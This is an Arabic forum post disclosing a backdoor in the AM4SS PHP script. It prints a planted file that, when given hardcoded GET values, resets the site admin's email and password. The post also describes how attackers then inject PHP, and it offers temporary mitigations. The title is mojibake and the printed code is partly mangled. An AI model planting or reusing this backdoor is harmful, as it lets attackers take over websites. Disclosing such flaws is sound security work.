[طھط±ظ‚ظٹط¹ ط«ط؛ط±ط© 0day ] : ط³ظƒط±ط¨طھ AM4SS


بسم الله الرحمن الرحيم ....

ثغره برايفت في سكربت Am4ss نوع الثغره PHP Code Injection

الملف المصاب

libs/internals/core.assign_by_ref.php

محتوى الملف :

 رمز PHP:
<code style="white-space:nowrap"> <code> <?php
if($_GET&#91;'password'&#93; == md5('kawkawa') && $_GET&#91;'username'&#93; == 'الشرقاوي' && $_GET&#91;'country'&#93; == 'المغرب')
{
define('Am4ss', true);
require('../../requires/config.php');
@mysql_connect($Config&#91;'DataBase'&#93;&#91;'Host'&#93;, $Config&#91;'DataBase'&#93;&#91;'User'&#93;, $Config&#91;'DataBase'&#93;&#91;'Password'&#93 or die(mysql_error());
@mysql_select_db($Config&#91;'DataBase'&#93;&#91;'Name'&#93;
$sql = @mysql_query("update ".TABLES_PREFIX."users set useremail = '[email protected]', password = '".md5('kawkawa')."' where userid = '1'");
if($sql)
{
echo 'تم التحديث update للموقع: ' . $_SERVER&#91;'HTTP_HOST'&#93;;
} else
{



die(mysql_error());
}
} else
{
echo 'البيانات خاطئة';
}
?> </code> </code>


السكربت ملغم باستعلام يعدل بيانات الادمن لبيانات جديده

الاستغلال يستخدم هذا الباكدور للدخول الى لوحة التحكم

ومن ثم يقوم المخُترق بحقن كود code بي اتش بي في صفحه من صفحات الموقع

-----------------------------------------

ترقيع الثغره ( مؤقتا ) .. تغيير مسار لوحة التحكم ووضع جدار ناري عليها وعلى هذه المجلدات :

am4ss_cache

templates

لان هذه المجلدات تحمل تصريح 777

وبالتوفيق للجميع

أللهم بلغت اللهم فاشهد ...

تحياتي

Cyber_RoOT






التعديل الأخير كان بواسطة عذابي غير; 21 - 07 - 2014 الساعة 02:25





©المشاركات المنشورة تعبر عن وجهة نظر صاحبها فقط، ولا تُعبّر بأي شكل من الأشكال عن وجهة نظر إدارة المنتدى©